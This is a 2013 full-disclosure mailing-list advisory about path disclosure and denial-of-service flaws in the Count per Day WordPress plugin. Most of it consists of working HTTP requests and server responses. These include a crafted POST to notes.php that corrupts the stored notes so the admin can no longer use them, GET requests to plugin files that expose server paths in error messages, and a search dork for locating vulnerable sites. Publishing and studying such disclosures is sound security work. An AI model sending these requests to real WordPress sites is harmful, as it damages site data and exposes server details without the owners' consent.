Date: Mon, 4 Mar 2013 16:44:52 +0100
From: alej andr0 <alejandr0.m0f0@...il.com>
To: undisclosed-recipients:;
Subject: WordPress Counter per Day plugin <= 3.2.3. Path
 Disclosure and Denial-Of-Service (DOS) and WordPress Counter per Day plugin
 <= 3.2.5. Path Disclosure

# Exploit Title: WordPress Counter per Day plugin <= 3.2.3. Path
Disclosure and Denial-Of-Service (DOS)
# Date: 2013-03-04
# Google Dork:inurl:/wp-content/plugins/count-per-day
#
# Author: alejandr0.m0f0
#
# versions: 3.2.3(tested)
#
# Impact:
#  -- path disclosure
#  -- DOS of the notes functionality of the count per day plugin
---------------------
HTTP request: #1
--
POST
/wp-content/plugins/count-per-day/notes.php

month=3&year=2013&date='\xbf\'"('&note=qwdqwd&new=%2B
---------------------
HTTP response:

Fatal error: [] operator not supported for strings in
.../websites/wordpress/wp-content/plugins/count-per-day/notes.php on
line 26
---------------------
--> PATH DISCLOSURE
once the previous request is performed, admin is unable to save notes
anymore, nor view the previously saved ones.
---------------------
HTTP request: #2
--
GET
/wp-content/plugins/count-per-day/notes.php
---------------------
HTTP response:
--
Notes
Warning: Invalid argument supplied for foreach() in
.../websites/wordpress/wp-content/plugins/count-per-day/notes.php on
line 85
---------------------
--> DENIAL OF SERVICE, unability to enter or view notes anymore
--> the structure of the wordpress stored object (wp_options WHERE
option_name='count_per_day_notes') is corrupted. did not take time
analyzing if this could leak to php code execution. this is unlikely
to be achieved.
---------------------


------------------------------------------------------------
# Exploit Title: WordPress Counter per Day plugin <= 3.2.5. Path Disclosure
# Date: 2013-03-04
# Google Dork:inurl:/wp-content/plugins/count-per-day
#
# Author: alejandr0.m0f0
#
# versions: 3.2.5(tested)
#
# Impact:
#  -- path disclosure

----
GET
/wp-content/plugins/count-per-day/ajax.php
----
Notice: Undefined index: f in
...wp-content/plugins/count-per-day/ajax.php on line 2
----
GET
/wp-content/plugins/count-per-day/counter-core.php
----
Notice: Undefined variable: cpd_path in
...wp-content/plugins/count-per-day/counter-core.php on line 10
Notice: Undefined variable: cpd_path in
...wp-content/plugins/count-per-day/counter-core.php on line 11
Notice: Undefined variable: cpd_path in
...wp-content/plugins/count-per-day/counter-core.php on line 12
----
GET
/wp-content/plugins/count-per-day/counter-options.php
----
Fatal error: Call to undefined function wp_create_nonce() in
...wp-content/plugins/count-per-day/counter-options.php on line 346
----
GET
/wp-content/plugins/count-per-day/counter.php
----
Notice: Use of undefined constant ABSPATH - assumed 'ABSPATH' in
...wp-content/plugins/count-per-day/counter.php on line 15
Notice: Use of undefined constant PLUGINDIR - assumed 'PLUGINDIR' in
...wp-content/plugins/count-per-day/counter.php on line 15
Warning: include_once(ABSPATHPLUGINDIR/count-per-day/counter-core.php):
failed to open stream: No such file or directory in
...wp-content/plugins/count-per-day/counter.php on line 16
Warning: include_once(): Failed opening
'ABSPATHPLUGINDIR/count-per-day/counter-core.php' for inclusion
(include_path='.:') in ...wp-content/plugins/count-per-day/counter.php
on line 16
Fatal error: Class 'CountPerDayCore' not found in
...wp-content/plugins/count-per-day/counter.php on line 22

---------
mitigation for path disclosure: PHP configuration, disable printing of
any error for remote clients

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists